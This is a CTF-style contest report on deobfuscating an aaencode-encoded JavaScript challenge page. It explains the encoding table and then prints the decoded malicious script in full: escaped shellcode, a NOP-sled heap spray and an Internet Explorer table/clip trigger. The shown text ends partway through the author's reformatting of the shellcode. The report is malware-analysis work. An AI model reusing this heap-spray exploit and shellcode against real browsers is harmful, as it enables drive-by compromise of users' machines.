Hackers' Dream Contest

Report: Web Challenge

0. About

Author: Tsukasa Ooi

Date: 2010/11/23-29

1. Decoding Obfuscated Script

1-1. aaencode

This type of JavaScript is very famous in Japan. It does not mean this is famous as a threat. But its author -- Yosuke Hasegawa -- is very famous in Japan. He transforms JavaScript into interesting and various styles.

Obviously, this script is generated by his creation, aaencode. First, I will try deobfuscate the script using its source code. aaencode's source code is embedded as a JavaScript in the site above so I (and you) can get one.

Now, I assume target's script is generated by aaencode and I will make `aadecode' that decode/deobfuscate the script generated by aaencode. Important part is `aaencode' function in the generator. Generating script is very simple and only few characters are used for encoding except header and footer. I will show you the convertion table.

\(゚Д゚)[゚ε゚]
u(o゚ー゚o)
0(c^_^o)
1(゚Θ゚)
2((o^_^o) - (゚Θ゚))
3(o^_^o)
4(゚ー゚)
5((゚ー゚) + (゚Θ゚))
6((o^_^o) +(o^_^o))
7((゚ー゚) + (o^_^o))
8((゚ー゚) + (゚ー゚))
9((゚ー゚) + (゚ー゚) + (゚Θ゚))
a(゚Д゚) .゚ω゚ノ
b(゚Д゚) .゚Θ゚ノ
c(゚Д゚) ['c']
d(゚Д゚) .゚ー゚ノ
e(゚Д゚) .゚Д゚ノ
f(゚Д゚) [゚Θ゚]

Each character is escaped (in \ooo form or \uxxxx form) and transcoded. The obfuscated string is generated just concatinating each character. This script executed using eval technique.

1-2. aadecode

aadecode recovers original characters in the script using the table above and unescapes it. Web-Challenge.html contains two obfuscated scripts and aadecode can decode both scripts without any errors.

This is intermediate (escaped) result below.

\141\154\145\162\164\50\42\167\145\40\154\157\166\145\40\101\123\105\103\40\53\137\53\42\51
\162\162\162\142\75\40\50\42\167\157\60\157\61\60\105\102\167\157\60\157\64\102\65\102\167\157\60\157\103\71\63\63\167\157\60\157\102\71\66\66\167\157\60\157\60\63\70\63\167\157\60\157\63\64\70\60\167\157\60\157\104\61\60\102\167\157\60\157\106\101\105\62\167\157\60\157\60\65\105\102\167\157\60\157\105\102\105\70\167\157\60\157\106\106\106\106\167\157\60\157\63\70\106\106\167\157\60\157\104\63\60\67\167\157\60\157\104\61\104\61\167\157\60\157\102\65\70\105\167\157\60\157\105\61\67\60\167\157\60\157\104\61\104\61\167\157\60\157\65\101\104\61\167\157\60\157\104\104\71\61\167\157\60\157\101\61\65\101\167\157\60\157\67\103\103\104\167\157\60\157\102\71\65\101\167\157\60\157\65\101\104\71\167\157\60\157\102\102\62\66\167\157\60\157\70\70\104\64\167\157\60\157\70\103\63\71\167\157\60\157\104\61\104\60\167\157\60\157\63\63\104\61\167\157\60\157\71\61\62\70\167\157\60\157\105\71\65\61\167\157\60\157\101\64\61\62\167\157\60\157\65\70\62\102\167\157\60\157\105\65\71\67\167\157\60\157\101\63\102\71\167\157\60\157\104\61\101\65\167\157\60\157\102\71\104\61\167\157\60\157\101\62\102\103\167\157\60\157\102\62\101\67\167\157\60\157\60\104\65\101\167\157\60\157\103\61\63\101\167\157\60\157\62\105\70\62\167\157\60\157\105\65\101\67\167\157\60\157\62\105\65\101\167\157\60\157\65\101\70\64\167\157\60\157\65\101\63\104\167\157\60\157\65\103\103\67\167\157\60\157\104\64\70\63\167\157\60\157\63\63\62\105\167\157\60\157\63\101\63\71\167\157\60\157\62\105\62\105\167\157\60\157\70\102\62\105\167\157\60\157\102\102\70\102\167\157\60\157\70\70\104\64\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\60\106\63\167\157\60\157\104\61\104\61\167\157\60\157\62\70\63\63\167\157\60\157\102\71\70\103\167\157\60\157\102\106\102\105\167\157\60\157\104\61\104\61\167\157\60\157\101\64\102\71\167\157\60\157\102\104\101\63\167\157\60\157\65\101\102\103\167\157\60\157\63\101\60\104\167\157\60\157\70\62\103\61\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\103\67\65\101\167\157\60\157\70\63\65\103\167\157\60\157\62\105\104\64\167\157\60\157\63\71\63\63\167\157\60\157\62\105\63\101\167\157\60\157\62\105\62\105\167\157\60\157\70\102\70\102\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\61\62\63\167\157\60\157\104\61\104\61\167\157\60\157\102\71\70\103\167\157\60\157\105\62\102\104\167\157\60\157\104\61\105\63\167\157\60\157\101\62\102\71\167\157\60\157\102\64\102\71\167\157\60\157\65\101\102\104\167\157\60\157\63\101\60\104\167\157\60\157\70\62\103\61\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\103\67\65\101\167\157\60\157\70\63\65\103\167\157\60\157\62\105\104\64\167\157\60\157\63\71\63\63\167\157\60\157\62\105\63\101\167\157\60\157\62\105\62\105\167\157\60\157\70\102\70\102\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\61\61\65\167\157\60\157\104\61\104\61\167\157\60\157\66\105\63\71\167\157\60\157\104\61\104\61\167\157\60\157\70\103\104\61\167\157\60\157\63\104\65\60\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\60\104\65\101\167\157\60\157\102\71\70\62\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\70\67\62\105\167\157\60\157\65\70\104\65\167\157\60\157\105\71\70\106\167\157\60\157\104\65\61\66\167\157\60\157\102\104\104\62\167\157\60\157\102\66\102\105\167\157\60\157\61\66\106\106\167\157\60\157\104\62\71\65\167\157\60\157\102\66\104\65\167\157\60\157\102\67\102\70\167\157\60\157\105\62\104\61\167\157\60\157\70\61\61\61\167\157\60\157\70\62\70\61\167\157\60\157\60\67\65\101\167\157\60\157\61\63\65\62\167\157\60\157\70\63\101\101\167\157\60\157\62\105\70\61\167\157\60\157\106\71\70\67\167\157\60\157\63\104\65\60\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\60\104\65\101\167\157\60\157\61\61\105\62\167\157\60\157\102\102\70\61\167\157\60\157\70\62\103\102\167\157\60\157\62\105\70\61\167\157\60\157\105\61\70\67\167\157\60\157\61\101\65\101\167\157\60\157\65\61\71\60\167\157\60\157\104\61\105\70\167\157\60\157\62\102\101\64\167\157\60\157\104\60\61\66\167\157\60\157\102\60\70\104\167\157\60\157\102\66\102\104\167\157\60\157\71\60\61\66\167\157\60\157\106\106\104\65\167\157\60\157\101\71\102\64\167\157\60\157\61\66\102\64\167\157\60\157\104\71\71\60\167\157\60\157\104\61\104\61\167\157\60\157\104\61\104\61\167\157\60\157\70\106\65\70\167\157\60\157\62\105\105\104\167\157\60\157\105\104\101\67\167\157\60\157\101\67\62\105\167\157\60\157\63\71\105\71\167\157\60\157\104\61\64\64\167\157\60\157\104\61\104\61\167\157\60\157\61\61\105\62\167\157\60\157\103\65\63\101\167\157\60\157\62\105\70\61\167\157\60\157\105\104\101\67\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\70\67\65\101\167\157\60\157\65\103\104\71\167\157\60\157\104\64\70\63\167\157\60\157\63\63\62\105\167\157\60\157\63\66\63\71\167\157\60\157\62\105\62\105\167\157\60\157\102\71\62\105\167\157\60\157\104\62\63\71\167\157\60\157\104\61\104\61\167\157\60\157\70\67\62\105\167\157\60\157\62\105\103\61\167\157\60\157\105\71\101\67\167\157\60\157\70\67\62\105\167\157\60\157\65\60\104\104\167\157\60\157\104\65\61\65\167\157\60\157\104\61\104\63\167\157\60\157\105\62\104\61\167\157\60\157\102\102\61\70\167\157\60\157\70\60\104\62\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\102\63\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\70\61\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\70\103\167\157\60\157\62\105\70\60\167\157\60\157\106\104\70\67\167\157\60\157\62\105\70\60\167\157\60\157\103\65\70\67\167\157\60\157\70\67\70\60\167\157\60\157\101\64\65\101\167\157\60\157\65\101\105\104\167\157\60\157\106\106\101\65\167\157\60\157\104\62\101\71\167\157\60\157\70\67\62\64\167\157\60\157\101\67\65\101\167\157\60\157\104\62\106\61\167\157\60\157\105\62\62\64\167\157\60\157\71\70\61\70\167\157\60\157\67\103\71\60\167\157\60\157\61\64\104\62\167\157\60\157\60\101\105\62\167\157\60\157\66\106\104\105\167\157\60\157\105\102\103\61\167\157\60\157\101\65\60\67\167\157\60\157\61\60\104\71\167\157\60\157\104\103\61\101\167\157\60\157\60\102\104\62\167\157\60\157\63\101\71\61\167\157\60\157\105\101\62\60\167\157\60\157\101\64\103\105\167\157\60\157\70\106\63\66\167\157\60\157\70\106\65\101\167\157\60\157\104\62\106\65\167\157\60\157\102\67\60\103\167\157\60\157\104\104\65\101\167\157\60\157\65\101\71\101\167\157\60\157\103\104\70\106\167\157\60\157\60\103\104\62\167\157\60\157\104\65\65\101\167\157\60\157\104\62\65\101\167\157\60\157\67\101\61\64\167\157\60\157\70\70\70\106\167\157\60\157\70\64\61\62\167\157\60\157\63\104\65\101\167\157\60\157\63\104\65\62\167\157\60\157\70\63\70\65\167\157\60\157\70\62\70\60\167\157\60\157\70\66\70\67\167\157\60\157\101\103\65\103\167\157\60\157\66\70\67\104\167\157\60\157\104\61\103\64\167\157\60\157\104\61\104\61\167\157\60\157\61\104\66\71\167\157\60\157\61\104\61\104\167\157\60\157\62\62\61\104\167\157\60\157\61\66\67\101\167\157\60\157\62\104\71\64\167\157\60\157\104\61\104\61\167\157\60\157\104\61\104\61\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\71\61\167\157\60\157\71\64\65\101\167\157\60\157\70\61\104\71\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\71\167\157\60\157\104\71\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\71\167\157\60\157\62\71\101\103\167\157\60\157\101\64\104\61\167\157\60\157\105\62\104\66\167\157\60\157\63\70\61\61\167\157\60\157\104\61\61\104\167\157\60\157\104\61\104\61\167\157\60\157\61\106\65\101\167\157\60\157\61\60\65\62\167\157\60\157\70\60\71\65\167\157\60\157\71\103\65\101\167\157\60\157\70\60\104\104\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\71\167\157\60\157\104\71\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\65\167\157\60\157\62\65\101\103\167\157\60\157\101\64\104\61\167\157\60\157\105\62\104\66\167\157\60\157\63\70\61\61\167\157\60\157\104\61\67\104\167\157\60\157\104\61\104\61\167\157\60\157\71\64\61\66\167\157\60\157\104\61\63\104\167\157\60\157\104\61\104\61\167\157\60\157\65\101\104\61\167\157\60\157\62\65\70\64\167\157\60\157\102\102\70\63\167\157\60\157\102\102\104\60\167\157\60\157\65\101\104\67\167\157\60\157\65\62\60\67\167\157\60\157\71\71\61\63\167\157\60\157\62\105\70\63\167\157\60\157\106\61\70\67\167\157\60\157\61\65\65\62\167\157\60\157\66\71\103\61\167\157\60\157\104\61\104\60\167\157\60\157\104\61\104\61\167\157\60\157\61\61\65\64\167\157\60\157\102\105\101\65\167\157\60\157\71\103\65\101\167\157\60\157\70\60\62\71\167\157\60\157\104\60\102\102\167\157\60\157\104\60\102\102\167\157\60\157\70\64\65\103\167\157\60\157\70\63\62\61\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\104\167\157\60\157\103\61\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\104\167\157\60\157\62\104\101\103\167\157\60\157\101\64\104\61\167\157\60\157\63\101\104\63\167\157\60\157\65\101\70\63\167\157\60\157\63\104\71\64\167\157\60\157\61\61\65\62\167\157\60\157\65\70\104\60\167\157\60\157\63\104\71\64\167\157\60\157\101\103\65\62\167\157\60\157\104\67\63\104\167\157\60\157\104\63\101\105\167\157\60\157\61\70\63\101\167\157\60\157\71\103\65\101\167\157\60\157\65\60\62\61\167\157\60\157\62\105\63\60\167\157\60\157\104\61\104\61\167\157\60\157\65\64\104\61\167\157\60\157\101\65\61\70\167\157\60\157\65\101\106\61\167\157\60\157\62\61\70\64\167\157\60\157\63\63\65\60\167\157\60\157\104\61\62\105\167\157\60\157\104\61\104\61\167\157\60\157\105\106\66\70\167\157\60\157\104\61\104\61\167\157\60\157\65\60\104\61\167\157\60\157\62\105\63\60\167\157\60\157\104\61\104\61\167\157\60\157\105\101\104\61\167\157\60\157\101\65\60\60\167\157\60\157\65\102\104\71\167\157\60\157\62\61\71\64\167\157\60\157\105\106\105\65\167\157\60\157\71\64\65\71\167\157\60\157\65\101\62\61\167\157\60\157\62\65\71\103\167\157\60\157\102\102\70\60\167\157\60\157\102\102\104\60\167\157\60\157\65\103\104\60\167\157\60\157\62\61\70\64\167\157\60\157\62\105\70\63\167\157\60\157\106\61\70\67\167\157\60\157\61\65\65\62\167\157\60\157\63\101\103\61\167\157\60\157\65\101\65\71\167\157\60\157\62\71\71\64\167\157\60\157\62\105\70\61\167\157\60\157\106\65\70\67\167\157\60\157\61\65\65\62\167\157\60\157\65\101\104\65\167\157\60\157\62\65\71\103\167\157\60\157\62\105\70\60\167\157\60\157\106\65\70\67\167\157\60\157\61\65\65\62\167\157\60\157\66\71\104\65\167\157\60\157\104\61\104\60\167\157\60\157\104\61\104\61\167\157\60\157\70\106\70\105\167\157\60\157\70\70\70\101\167\157\60\157\65\62\70\102\167\157\60\157\70\65\61\65\167\157\60\157\63\64\65\101\167\157\60\157\61\62\70\103\167\157\60\157\106\64\63\71\167\157\60\157\62\105\62\103\167\157\60\157\65\106\62\105\167\157\60\157\104\106\71\106\167\157\60\157\105\62\63\104\167\157\60\157\65\102\61\102\167\157\60\157\64\71\70\101\167\157\60\157\65\102\62\106\167\157\60\157\106\64\104\106\167\157\60\157\62\105\66\61\167\157\60\157\66\61\61\63\167\157\60\157\106\103\71\70\167\157\60\157\101\65\60\101\167\157\60\157\71\71\103\106\167\157\60\157\102\106\61\103\167\157\60\157\106\106\101\104\167\157\60\157\67\65\63\60\167\157\60\157\104\106\101\70\167\157\60\157\60\71\63\66\167\157\60\157\67\66\65\102\167\157\60\157\70\71\63\66\167\157\60\157\64\106\71\104\167\157\60\157\105\67\60\101\167\157\60\157\106\105\103\102\167\157\60\157\70\106\101\61\167\157\60\157\63\60\66\101\167\157\60\157\103\63\103\101\167\157\60\157\61\101\104\63\167\157\60\157\105\60\103\64\167\157\60\157\105\62\105\63\167\157\60\157\105\64\105\65\167\157\60\157\105\66\105\67\167\157\60\157\105\70\105\71\167\157\60\157\104\61\105\61\167\157\60\157\101\63\104\61\167\157\60\157\106\101\102\63\167\157\60\157\101\66\104\61\167\157\60\157\106\101\102\63\167\157\60\157\71\103\104\61\167\157\60\157\64\61\70\102\167\157\60\157\104\62\104\61\167\157\60\157\104\61\104\61\167\157\60\157\71\70\104\61\167\157\60\157\70\71\71\64\167\157\60\157\71\104\70\61\167\157\60\157\70\63\71\105\167\157\60\157\106\106\71\64\167\157\60\157\70\71\71\64\167\157\60\157\104\61\71\64\167\157\60\157\101\61\102\105\167\157\60\157\102\106\102\64\167\157\60\157\102\71\104\61\167\157\60\157\101\65\101\65\167\157\60\157\105\102\101\61\167\157\60\157\106\105\106\105\167\157\60\157\101\66\101\66\167\157\60\157\106\106\101\66\167\157\60\157\102\71\102\60\167\157\60\157\102\104\102\106\167\157\60\157\102\63\102\60\167\157\60\157\102\62\106\106\167\157\60\157\102\103\102\105\167\157\60\157\102\101\104\61\167\157\60\157\101\70\102\64\167\157\60\157\105\102\106\61\167\157\60\157\102\71\106\61\167\157\60\157\102\104\102\64\167\157\60\157\102\105\102\104\167\157\60\157\71\60\106\61\167\157\60\157\71\64\70\62\167\157\60\157\71\61\71\62\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\104\61\106\60\42\51\73\162\162\162\141\75\165\156\145\163\143\141\160\145\50\162\162\162\142\56\162\145\160\154\141\143\145\50\57\167\157\60\157\57\147\54\42\45\165\42\51\51\73\40\166\141\162\40\162\162\162\141\142\142\142\40\75\40\60\170\70\66\60\60\60\55\50\162\162\162\141\56\154\145\156\147\164\150\52\62\51\73\167\167\167\167\167\167\167\167\167\167\75\165\156\145\163\143\141\160\145\50\47\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\47\51\73\40\167\150\151\154\145\50\167\167\167\167\167\167\167\167\167\167\56\154\145\156\147\164\150\74\162\162\162\141\142\142\142\57\62\51\40\173\40\167\167\167\167\167\167\167\167\167\167\53\75\167\167\167\167\167\167\167\167\167\167\73\40\175\40\166\141\162\40\142\151\147\142\154\157\143\153\40\75\40\167\167\167\167\167\167\167\167\167\167\56\163\165\142\163\164\162\151\156\147\50\60\54\162\162\162\141\142\142\142\57\62\51\73\40\155\145\155\40\75\40\156\145\167\40\101\162\162\141\171\50\51\73\40\146\157\162\50\151\75\60\73\40\151\74\61\65\60\60\73\40\151\53\53\51\40\173\155\145\155\133\151\135\40\75\40\142\151\147\142\154\157\143\153\40\53\40\142\151\147\142\154\157\143\153\40\53\40\162\162\162\141\73\175\40\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\164\141\142\154\145\40\163\164\171\154\145\75\160\157\163\151\164\151\157\156\72\141\142\163\157\154\165\164\145\73\143\154\151\160\72\162\145\143\164\50\60\51\76\42\51\73

And now the unescaped one.

alert("we love ASEC +_+")
rrrb= ("wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2wo0o05EBwo0oEBE8wo0oFFFFwo0o38FFwo0oD307wo0oD1D1wo0oB58Ewo0oE170wo0oD1D1wo0o5AD1wo0oDD91wo0oA15Awo0o7CCDwo0oB95Awo0o5AD9wo0oBB26wo0o88D4wo0o8C39wo0oD1D0wo0o33D1wo0o9128wo0oE951wo0oA412wo0o582Bwo0oE597wo0oA3B9wo0oD1A5wo0oB9D1wo0oA2BCwo0oB2A7wo0o0D5Awo0oC13Awo0o2E82wo0oE5A7wo0o2E5Awo0o5A84wo0o5A3Dwo0o5CC7wo0oD483wo0o332Ewo0o3A39wo0o2E2Ewo0o8B2Ewo0oBB8Bwo0o88D4wo0o5A84wo0o3939wo0oD0F3wo0oD1D1wo0o2833wo0oB98Cwo0oBFBEwo0oD1D1wo0oA4B9wo0oBDA3wo0o5ABCwo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD123wo0oD1D1wo0oB98Cwo0oE2BDwo0oD1E3wo0oA2B9wo0oB4B9wo0o5ABDwo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD115wo0oD1D1wo0o6E39wo0oD1D1wo0o8CD1wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0oB982wo0oD0D1wo0oD1D1wo0o872Ewo0o58D5wo0oE98Fwo0oD516wo0oBDD2wo0oB6BEwo0o16FFwo0oD295wo0oB6D5wo0oB7B8wo0oE2D1wo0o8111wo0o8281wo0o075Awo0o1352wo0o83AAwo0o2E81wo0oF987wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0o11E2wo0oBB81wo0o82CBwo0o2E81wo0oE187wo0o1A5Awo0o5190wo0oD1E8wo0o2BA4wo0oD016wo0oB08Dwo0oB6BDwo0o9016wo0oFFD5wo0oA9B4wo0o16B4wo0oD990wo0oD1D1wo0oD1D1wo0o8F58wo0o2EEDwo0oEDA7wo0oA72Ewo0o39E9wo0oD144wo0oD1D1wo0o11E2wo0oC53Awo0o2E81wo0oEDA7wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0o875Awo0o5CD9wo0oD483wo0o332Ewo0o3639wo0o2E2Ewo0oB92Ewo0oD239wo0oD1D1wo0o872Ewo0o2EC1wo0oE9A7wo0o872Ewo0o50DDwo0oD515wo0oD1D3wo0oE2D1wo0oBB18wo0o80D2wo0o175Awo0o1152wo0o81B3wo0o175Awo0o1152wo0o8181wo0o175Awo0o1152wo0o818Cwo0o2E80wo0oFD87wo0o2E80wo0oC587wo0o8780wo0oA45Awo0o5AEDwo0oFFA5wo0oD2A9wo0o8724wo0oA75Awo0oD2F1wo0oE224wo0o9818wo0o7C90wo0o14D2wo0o0AE2wo0o6FDEwo0oEBC1wo0oA507wo0o10D9wo0oDC1Awo0o0BD2wo0o3A91wo0oEA20wo0oA4CEwo0o8F36wo0o8F5Awo0oD2F5wo0oB70Cwo0oDD5Awo0o5A9Awo0oCD8Fwo0o0CD2wo0oD55Awo0oD25Awo0o7A14wo0o888Fwo0o8412wo0o3D5Awo0o3D52wo0o8385wo0o8280wo0o8687wo0oAC5Cwo0o687Dwo0oD1C4wo0oD1D1wo0o1D69wo0o1D1Dwo0o221Dwo0o167Awo0o2D94wo0oD1D1wo0oD1D1wo0o175Awo0o1152wo0o8191wo0o945Awo0o81D9wo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5229wo0o29ACwo0oA4D1wo0oE2D6wo0o3811wo0oD11Dwo0oD1D1wo0o1F5Awo0o1052wo0o8095wo0o9C5Awo0o80DDwo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5225wo0o25ACwo0oA4D1wo0oE2D6wo0o3811wo0oD17Dwo0oD1D1wo0o9416wo0oD13Dwo0oD1D1wo0o5AD1wo0o2584wo0oBB83wo0oBBD0wo0o5AD7wo0o5207wo0o9913wo0o2E83wo0oF187wo0o1552wo0o69C1wo0oD1D0wo0oD1D1wo0o1154wo0oBEA5wo0o9C5Awo0o8029wo0oD0BBwo0oD0BBwo0o845Cwo0o8321wo0o872Ewo0o52CDwo0oC115wo0o9458wo0o522Dwo0o2DACwo0oA4D1wo0o3AD3wo0o5A83wo0o3D94wo0o1152wo0o58D0wo0o3D94wo0oAC52wo0oD73Dwo0oD3AEwo0o183Awo0o9C5Awo0o5021wo0o2E30wo0oD1D1wo0o54D1wo0oA518wo0o5AF1wo0o2184wo0o3350wo0oD12Ewo0oD1D1wo0oEF68wo0oD1D1wo0o50D1wo0o2E30wo0oD1D1wo0oEAD1wo0oA500wo0o5BD9wo0o2194wo0oEFE5wo0o9459wo0o5A21wo0o259Cwo0oBB80wo0oBBD0wo0o5CD0wo0o2184wo0o2E83wo0oF187wo0o1552wo0o3AC1wo0o5A59wo0o2994wo0o2E81wo0oF587wo0o1552wo0o5AD5wo0o259Cwo0o2E80wo0oF587wo0o1552wo0o69D5wo0oD1D0wo0oD1D1wo0o8F8Ewo0o888Awo0o528Bwo0o8515wo0o345Awo0o128Cwo0oF439wo0o2E2Cwo0o5F2Ewo0oDF9Fwo0oE23Dwo0o5B1Bwo0o498Awo0o5B2Fwo0oF4DFwo0o2E61wo0o6113wo0oFC98wo0oA50Awo0o99CFwo0oBF1Cwo0oFFADwo0o7530wo0oDFA8wo0o0936wo0o765Bwo0o8936wo0o4F9Dwo0oE70Awo0oFECBwo0o8FA1wo0o306Awo0oC3CAwo0o1AD3wo0oE0C4wo0oE2E3wo0oE4E5wo0oE6E7wo0oE8E9wo0oD1E1wo0oA3D1wo0oFAB3wo0oA6D1wo0oFAB3wo0o9CD1wo0o418Bwo0oD2D1wo0oD1D1wo0o98D1wo0o8994wo0o9D81wo0o839Ewo0oFF94wo0o8994wo0oD194wo0oA1BEwo0oBFB4wo0oB9D1wo0oA5A5wo0oEBA1wo0oFEFEwo0oA6A6wo0oFFA6wo0oB9B0wo0oBDBFwo0oB3B0wo0oB2FFwo0oBCBEwo0oBAD1wo0oA8B4wo0oEBF1wo0oB9F1wo0oBDB4wo0oBEBDwo0o90F1wo0o9482wo0o9192wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0oD1F0");rrra=unescape(rrrb.replace(/wo0o/g,"%u")); var rrrabbb = 0x86000-(rrra.length*2);wwwwwwwwww=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090'); while(wwwwwwwwww.length<rrrabbb/2) { wwwwwwwwww+=wwwwwwwwww; } var bigblock = wwwwwwwwww.substring(0,rrrabbb/2); mem = new Array(); for(i=0; i<1500; i++) {mem[i] = bigblock + bigblock + rrra;} document.write("<table style=position:absolute;clip:rect(0)>");

Second script shall be related to the vuln of IE.

1-3. base64 hint?!

Incidentally, I found several base64 string at the end of html file. By decoding base64 repeatedly, I found interesting string in the middle.

Thx hasegawa!! do you know only base64? -_-

Unfortunately, I already had decoded the script before this base64 string.

1-4. Differences between browsers

This script obfuscation is very browser-specific.

Internet Explore 6does not work
Internet Explore 7does not work
Internet Explore 8works!
Google Chrome (4-7)works!
Mozilla Firefox (3.0, 3.5, 3.6)works!
Android 2.1 (WebKit 530.17)works!
iOS 4.1 (Safari/WebKit 532.9)works!
Opera (10, 10.50, 10.63)works!

Almost all of recent, modern browsers can understand this obfuscated JavaScript and can run it.

Notable thing is compatibility-mode. The obfuscated script will not run on IE8 compatibility-mode. But because of meta tag, IE8 will recognize this file in standard-compliant mode.

<meta http-equiv="X-UA-Compatible" content="IE=edge" />

2. Analyze the decoded script

2-1. Header

I will make second script easy to read.

// Unescape the SHELLCODE
shellcode_esc = (
	"wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2" +
	"wo0o05EBwo0oEBE8wo0oFFFFwo0o38FFwo0oD307wo0oD1D1wo0oB58Ewo0oE170" +
	"wo0oD1D1wo0o5AD1wo0oDD91wo0oA15Awo0o7CCDwo0oB95Awo0o5AD9wo0oBB26" +
	"wo0o88D4wo0o8C39wo0oD1D0wo0o33D1wo0o9128wo0oE951wo0oA412wo0o582B" +
	"wo0oE597wo0oA3B9wo0oD1A5wo0oB9D1wo0oA2BCwo0oB2A7wo0o0D5Awo0oC13A" +
	"wo0o2E82wo0oE5A7wo0o2E5Awo0o5A84wo0o5A3Dwo0o5CC7wo0oD483wo0o332E" +
	"wo0o3A39wo0o2E2Ewo0o8B2Ewo0oBB8Bwo0o88D4wo0o5A84wo0o3939wo0oD0F3" +
	"wo0oD1D1wo0o2833wo0oB98Cwo0oBFBEwo0oD1D1wo0oA4B9wo0oBDA3wo0o5ABC" +
	"wo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835C" +
	"wo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD123" +
	"wo0oD1D1wo0oB98Cwo0oE2BDwo0oD1E3wo0oA2B9wo0oB4B9wo0o5ABDwo0o3A0D" +
	"wo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4" +
	"wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD115wo0oD1D1" +
	"wo0o6E39wo0oD1D1wo0o8CD1wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0oB982" +
	"wo0oD0D1wo0oD1D1wo0o872Ewo0o58D5wo0oE98Fwo0oD516wo0oBDD2wo0oB6BE" +
	"wo0o16FFwo0oD295wo0oB6D5wo0oB7B8wo0oE2D1wo0o8111wo0o8281wo0o075A" +
	"wo0o1352wo0o83AAwo0o2E81wo0oF987wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5A" +
	"wo0o11E2wo0oBB81wo0o82CBwo0o2E81wo0oE187wo0o1A5Awo0o5190wo0oD1E8" +
	"wo0o2BA4wo0oD016wo0oB08Dwo0oB6BDwo0o9016wo0oFFD5wo0oA9B4wo0o16B4" +
	"wo0oD990wo0oD1D1wo0oD1D1wo0o8F58wo0o2EEDwo0oEDA7wo0oA72Ewo0o39E9" +
	"wo0oD144wo0oD1D1wo0o11E2wo0oC53Awo0o2E81wo0oEDA7wo0oA72Ewo0o5AE5" +
	"wo0o842Ewo0o3D5Awo0o875Awo0o5CD9wo0oD483wo0o332Ewo0o3639wo0o2E2E" +
	"wo0oB92Ewo0oD239wo0oD1D1wo0o872Ewo0o2EC1wo0oE9A7wo0o872Ewo0o50DD" +
	"wo0oD515wo0oD1D3wo0oE2D1wo0oBB18wo0o80D2wo0o175Awo0o1152wo0o81B3" +
	"wo0o175Awo0o1152wo0o8181wo0o175Awo0o1152wo0o818Cwo0o2E80wo0oFD87" +
